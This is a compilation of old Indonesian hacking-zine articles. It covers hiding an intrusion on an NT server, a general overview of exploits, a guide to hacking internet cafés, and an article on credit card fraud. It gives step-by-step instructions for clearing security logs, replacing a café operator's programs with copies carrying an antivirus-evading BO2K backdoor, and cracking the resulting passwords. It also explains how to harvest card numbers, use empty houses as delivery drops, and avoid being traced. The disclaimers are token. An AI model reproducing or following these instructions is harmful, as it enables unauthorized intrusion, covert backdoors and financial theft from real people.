memastikan bahwa kehadiran kamu didalam sistem tidak akan terdeteksi, hapus file cmd, getadmin, dan gasys.dll dari cgi-bin, dan lewat Event Viewer, periksa seluruh log "security event". Akhirnya, dengan menggunakan User Manager for Domains, hapus privilese admin dari account IUSR_SATURN
dan hapus account "iwan" yang baru saja kamu buat. Toh, kamu tidak akan membutuhkannya lagi. Sebelum kamu meninggalkan sang mesin, jangan lupa untuk mengeset prioritas L0phtCrack ke "High" supaya segala password bisa lebih cepat di-crack. Selamat bobo …



Eksploit



Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan shell UNIX baru yang baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalam konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinya dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit 'hacking' lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai 'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan
lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah eksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspek dari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploit program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root' bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin anda sudah alami sendiri, kadang sebuah cacat dalam program seperti maild atau ftpd bisa dimanfaatkan untuk tujuan 'header forging', 'ip spoofing', 'denial of service attack', dan 'mail bombing' (hello, Anton Pardede!).

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan eksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisa dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak, sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk di-eksploit. Contoh - contoh dari eksploit jenis ini adalah buffer overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana dua proses saling berlomba untuk menyelesaikan tugas masing-masing, biasanya proses A disuruh untuk menjalankan suatu utilitas yang membutuhkan privilese root temporer sementara proses B dirancang untuk mencegat proses A sebelum proses A kembali statusnya ke privilese user biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisa mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol (lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite' lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalau ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di situs-situs tertentu, seperti:
http://www.rootshell.com
http://www.antionline.com
http://www.rhino9.com
http://www.dhp.com/~fyodor
atau di situs Saya www.chacosite.com/download/hecker/

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file /etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf). Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasil masuk ke dalam sistem memanfaatkan login dan password dari salah seorang user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi, seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.
Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat dari http://www.l0pht.com. Untuk menghemat waktu, banyak cracker yang menulis skrip otomasi, jalankan skrip, tinggal berikan daftar target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel mengenai scanning/probing di situs-situs hacker).


Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain, namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisa bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan file password ke alamat email tertentu.)

HACK WARNET



Pertidaktanggungjawaban :
Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem
komputer terutama para operator / SysAdmin dari server warnet, penulis
tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun
bentuknya.

Tools : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

CARA : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.

(Setidaknya server harus ber-os MicroShit Windows 98/NT).
- Siapkan program backdoor kamu yang sudah kamu konfigurasi , agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh
antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.
- Cari program .exe yang biasanya sering dipakai oleh operator warnet, i.e:Mirc32.exe, iexplore.exe dll.
- Copy file tersebut di komputer client warnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k , http://www.bo2k.com ).
- Delete file original di komputer server (Hati - hati jika tdk bisa kemungkinan program sedang dipakai, pake program lain spt iexplore.exe ).
- Setelah mendelete file asli di komputer server, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.
- Logout dari client warnet dan bayar sewa internet. (Pasang muka lugu dan bego).
- Setelah sehari dirasa cukup maka kembali lagi ke warnet yang di-hack dan lakukan
scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ..... SELAMAT BUNG !! Anda layak tertawa..... hi....hi...hi....., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu....., list password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x..... tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP tanpa "ENCRYPT" sama sekali..

- Having fun..... and stay out of troble ..dan ingat "Junjunglah Etika HACKER", jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat - lihat server warnet...OK : ) .

>>>>> Pertanyaan, saran, kritik serta berbagai umpatan kotor dapat dialamatkan
ke: chaco@yahoo.com
(salam buat mbah_e,katoda,krembiz,bastard truth,social sterility,gedhi,cessy,wan abudz,stembase,and stc....)
(fuck for abal-abal ,taek-taek,bedhes-bhedes,yang mengkomersialkan ilmu pengetahuan di dunia ini,para koruptor,bangsat-bangsat microshit,dll yang membuat dunia ini jadi kotor karena ulah mereka)


Bye..........

Amankah Kartu Kredit Ini?



[Catatan Redaksi:
Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan
sebagai bahan referensi untuk tujuan pengetahuan saja. Jika kamu
memutuskan untuk melakukan tindak kejahatan, hal itu diluar tanggung
jawab 'kecoak elektronik'. Informasi bukanlah kejahatan. Mengetahui
cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk
melindungi diri kamu sendiri.]

Semenjak dipopulerkannya sistem kartu kredit sekitar tahun 70-an dulu, semakin banyak orang yang menggunakan sistem pembayaran kartu kredit sebab kartu kredit dianggap lebih praktis untuk dibawa-bawa dan lebih mudah sebab sistem pembayarannya adalah online. Di Amerika, Kanada dan negara-negara Eropa, kartu kredit adalah hal yang sangat lumrah digunakan,
bahkan oleh para pelajar SMA sekalipun. Di Indonesia, biar bagaimanapun, kartu kredit masih dipandang sebagai simbol status. Dulu saya ingat di waktu saya masih SMA di Lampung ada teman yang punya kartu kredit dan tiap hari diporotin oleh anak-anak. Beberapa tahun belakangan, dengan makin ramainya 'online business' di Indonesia, semakin meluaslah pemakaian kartu kredit sebagai sistem pembayaran, terutama di kota-kota metropolitan seperti Jakarta, Medan dan Surabaya.

Bagaimana kartu kredit bisa jatuh ke tangan orang lain.
=======================================================

Pada prinsipnya, sang kartu sendiri (plastik) sangat jarang didapatkan. Hal ini sebab orang beranggapan, jika kartu kreditnya disimpan di lemari dan hanya dikeluarkan pada saat ingin digunakan, maka akan sangat susah untuk menyalah gunakan kartu tsb. Ini adalah kesalahan yang cukup besar. Pada pokoknya, jika kamu ingin melakukan kejahatan penyalahgunaan kartu kredit, yang diperlukan adalah *nomor* kartu tersebut, beserta nama pemiliknya (banyak juga bisnis yang meminta tanggal kadaluwarsa, namun di Internet, biasanya kamu bisa lolos menggunakan nomor dan nama saja, asalkan tanggal kadaluwarsa diisi (dikarang-karang) paling tidak enam
bulan didepan).
Bagaimana caranya memperoleh nomor-nomor kartu kredit ini ??? Di negara-negara dimana kartu kredit digunakan secara meluas, untuk mendapatkan nomor kartu kredit, biasanya tidak memerlukan ketrampilan khusus. Kamu bisa iseng ngaduk-ngaduk tempat sampah toko grosir atau bisa
coba kerja di pom bensin, dan mendapatkan bon kartu kredit pelanggan. Di Indonesia, hal ini semakin mungkin dilakukan, terutama di pasar-pasar swalayan besar seperti Sogo, segitiga Senen, M Plaza, dll. Biasanya bon penerimaan berupa kertas berwarna yang mencantumkan nama, nomor kartu kredit, berapa total harga, dan seterusnya. Jika kamu seorang perempuan, itu lebih bagus lagi. Cari kerjaan sebagai kasir dan sempatkan diri untuk menyalin nomor-nomor tersebut. Perempuan juga jarang dicurigai ;-). Mengaduk-ngaduk tempat sampah juga bisa berguna, sebab selain bisa mendapatkan salinan bon, jika kamu ngaduk-ngaduk tempat sampah di dekat
bangunan ISP, kamu juga bisa mendapatkan password/login, dll (lihat artikel 'Trashing dan Social Engineering'). Metode mutakhir yang sekarang banyak digunakan di negara-negara maju
adalah dengan cara menggunakan perangkat 'surveillance' untuk mendapatkan nomor kartu kredit calon korban. Tentu saja jika kamu berhasil mendapatkan akses ke database milik ISP atau Web komersil, kamu bisa memanen ratusan bahkan ribuan nomor kartu kredit dari situ.

Sudah dapat kartunya, lalu?
===========================

Umumnya, para kriminil tingkat kecil-kecilan yang berhasil mendapat nomor kartu kredit milik orang lain menggunakannya untuk kebutuhan pribadi. Hal ini masih agak sulit dilakukan di Indonesia sebab masih jarang bisnis komersil yang bersedia menerima pembayaran kartu kredit tanpa mengecek detailnya. Di Kanada sini, cara yang banyak dipraktekkan adalah sbb:

- temukan rumah kosong / yang lagi ditinggalkan penghuninya untuk jangka
waktu yang lama
- buka katalog-katalog barang-barang menarik yang diinginkan
- telepon sang penjual, bayar dengan kartu kredit tsb (perlu tgl
kadaluwarsa, dan biasanya alamat sang empunya kartu).
- minta diantarkan ke alamat rumah kosong tadi (atau, lebih bagus lagi,
kamar hotel), dan minta 'express delivery' (hari berikutnya)
karang alasan seperti: perlu mendadak untuk presentasi lusa, atau
tetek bengek lainnya. gunakan social engineering.
- tunggu kedatangan barangnya.
- ambil barangnya, dan ... CABUT!

Dengan cara ini kadang-kadang para kriminil (umumnya anak ABG) bisa mendapatkan laptop Tilamook terbaru bernilai $5000. Sang pemilik kartu sendiri pada saat mengetahui bahwa kartunya telah disalah gunakan tidak akan dikenakan biaya apa-apa, selain mungkin administrasi pengurusan kasus, yang nilainya tidak sampai $50. Dengan makin maraknya servis internet, semakin banyak pula kriminil yang men(yalah)gunakan kartu kredit curian untuk mendapatkan servis gratis. Karena komputer itu bodoh, kamu bisa dengan gampangnya mengaku sebagai
pemilik yang sah. Biasanya dengan mengisi 'form' di webpage, kamu bisa registrasi untuk layanan tsb (kalau tidak salah d-net sudah punya fasilitas ini, melalui diffy.com-nya, tapi kurang pasti) atau bisa untuk mengorder sesuatu. Di Indonesia, yang paling sering digunakan oleh para
kriminil jenis baru ini (yang, umumnya adalah cowok ABG) adalah, apalagi kalau bukan, registrasi 'member' untuk klub-klub porno di Internet.


Beberapa anggapan
=================

1. Tidak mungkin saya bisa dilacak, toh, ini Internet, dan tak ada yang melihat. Hampir benar. Mungkin jika kamu hanya menggunakannya untuk pemalsuan kelas teri, akan dibiarkan saja berlalu. Dalam pemalsuan kelas kakap, pun, kamu masih bisa lolos tanpa dilacak. Tapi dengan syarat kamu benar-benar hati-hati. Gunakan line telepon yang bukan milikmu, gunakan account
internet bukan milikmu, dari web gunakan Anonymizer, dll dll (seperti layaknya cracking/intruding). Namun resiko kamu terlacak jelas ada, bahkan di Indonesia sekalipun. Setiap transaksi di Internet merekam nomor IP kamu, walaupun browser kamu tidak diset 'secure'. Anonymizer tidak bersedia melayani protokol https:// (secure HTTP). Dial-in server yang
kamu gunakan punya catatan nomor mana yang memanggil. Dan, kalo dipikir-pikir, jika kamu benar-benar konak, kenapa susah-susah, sih? Toh gambar-gambar kayak gituan banyak tersedia eceran kaki lima. Menggunakan kartu kredit milik orang ada gunanya jika misalnya kamu berhasil
mendapatkan kartu kredit milik Bambang Suharto atau sodara-sodaranya. Nah, itu baru enak, bisa kamu porotin tuh orang-orang yang selama ini morotin rakyat.

2. Kita bisa menggunakan kartu kredit hasil dari 'CC Generator'.
Biasanya tidak benar. Memang, banyak program-program yang beredar di internet dan bisa menghasilkan nomor kartu kredit, namun program-program tsb biasanya bekerja atas dasar logaritma nomor kartu kredit. Dan 'nomor kartu kredit' hasil buatan program-program tsb adalah fiktif. Sedikit servis di Internet yang melakukan check hanya berdasarkan algoritma ini
saja. Pada umumnya servis-servis komersial menggunakan check berdasar: Nama Pemegang Kartu, Nomor Kartu, dan Kode Pos alamat pemegang kartu.


3. Saya sudah berhasil mendapatkan password/login untuk barely.hustler.com (atau sejenisnya) tentunya mulai dari sekarang, saya selalu bisa mengakses site tsb sebagai 'member'. Tidak benar. Biasanya nomor kartu kredit hasil curian mempunyai 'umur hidup' tertentu. Umur hidup ini bervariasi. Kadang-kadang setelah kamu meregistrasi/mengorder barang pada malam hari, keesokan harinya sang perusahaan korban melakukan check, dan menemukan kejanggalan (contoh: Alamat tidak sinkron). Atau bisa juga minggu depannya. Kemungkinan lain adalah sang pemilik kartu kredit yang asli akan menemukan kejanggalan di 'bill' (laporan rekening) kartu kreditnya. Hal ini akan membuatnya waspada dan melaporkan kepada bank/institusi finansialnya. Segera setelah itu, account ilegal kamu akan dimatikan (dan, jika serius masalahnya, bisa
dilakukan pelacakan). Cara yang bisa digunakan untuk memperpanjang 'umur hidup' nomor curianmu antara lain adalah dengan cara menggunakan kartu kredit korporasi (milik perusahaan besar), membatasi transaksi ilegal yang dilakukan (jangan diumbar sekali pakai habisin $200), dlsb.

4. Jangan sekali-kali menggunakan kartu kredit untuk telepon SLJJ/Long Distance.
Cukup benar. Di Amerika, perusahaan-perusahaan seperti Sprint, AT&T, dll menerima kartu kredit sebagai ganti koin untuk layanan telepon jarak jauh, atau bahkan kadang-kadang internasional. Walaupun kamu menggunakan telepon umum, resiko masih ada. Mereka bisa melacak siapa yang kamu telepon. Hal ini tentunya bukan masalah jika kamu menelepon teman kamu yang *juga*
menggunakan telepon umum, atau teman kamu yang tinggal di, ... Libya,misalnya.

Penutup
=======

Kayaknya cukup segini dulu, deh, sebab udah mulai kepanjangan nih. Saran saya kepada kalian yang tertarik untuk menjadi 'professional carder', hati-hatilah selalu. Eksplorasi adalah hal yang baik, tapi pastikan sedapat mungkin kamu tidak merugikan orang lain atau dirimu sendiri. Gitu
dulu, deh. Ciao ...

- Belleville, ON